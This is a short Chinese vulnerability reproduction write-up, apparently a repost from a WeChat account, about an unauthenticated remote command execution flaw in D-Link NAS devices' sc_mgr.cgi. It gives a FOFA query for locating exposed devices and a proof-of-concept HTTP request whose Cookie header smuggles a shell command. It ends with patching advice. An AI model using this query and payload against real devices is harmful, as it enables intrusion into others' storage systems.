wxvl/doc/【漏洞复现】D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞复现.md

4.2 KiB
Raw Blame History

【漏洞复现】D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞复现

河北镌远 河北镌远网络科技有限公司 2024-11-19 09:39

点击箭头处
“蓝色字”
,关注我们哦!!

产品简介

**D-Link NAS设备是一种基于网络的存储解决方案作为网络存储设备旨在为企业提供大容量的存储空间并通过网络连接实现数据的访问和管理。**这种设备不仅满足了企业对数据存储的需求还提供了高效的数据共享和访问功能提升了企业数据管理的效率和灵活性。广泛应用于各种企业场景如文档存储、图片和视频存储、数据库备份等。特别是在需要高效数据共享和访问的企业环境中如设计工作室、广告公司、医疗机构等D-Link NAS设备更是发挥了其强大的功能和优势。

漏洞概述

D-Link NAS设备 /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info 接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。

复现环境

FOFA

body="/cgi-bin/login_mgr.cgi"  &&  body="cmd=cgi_get_ssl_info"

漏洞复现

PoC

GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0

Accept: /

Accept-Encoding: gzip, deflate

Connection: close

Cookie: username=mopfdfsewo'& id & echo 'mopfdfsewo;

修复建议

应用补丁和更新: 用户应下载并安装 D-Link 提供的任何固件更新。

限制网络访问: 作为临时措施,对 NAS 管理界面的网络访问应仅限于受信任的 IP 地址。

监控固件更新: 受影响的设备用户应密切关注 D-Link 即将提供的任何安全补丁。

文章来源:
网络

公众号“河北镌远网络科技有限公司”所发表内容注明来源的,版权归原出处所有(无法查证版权的或者未注明出处的均来自网络,系转载,转载的目的在于传递更多信息,版权属于原作者。如有侵权,请联系,小编会第一时间删除处理)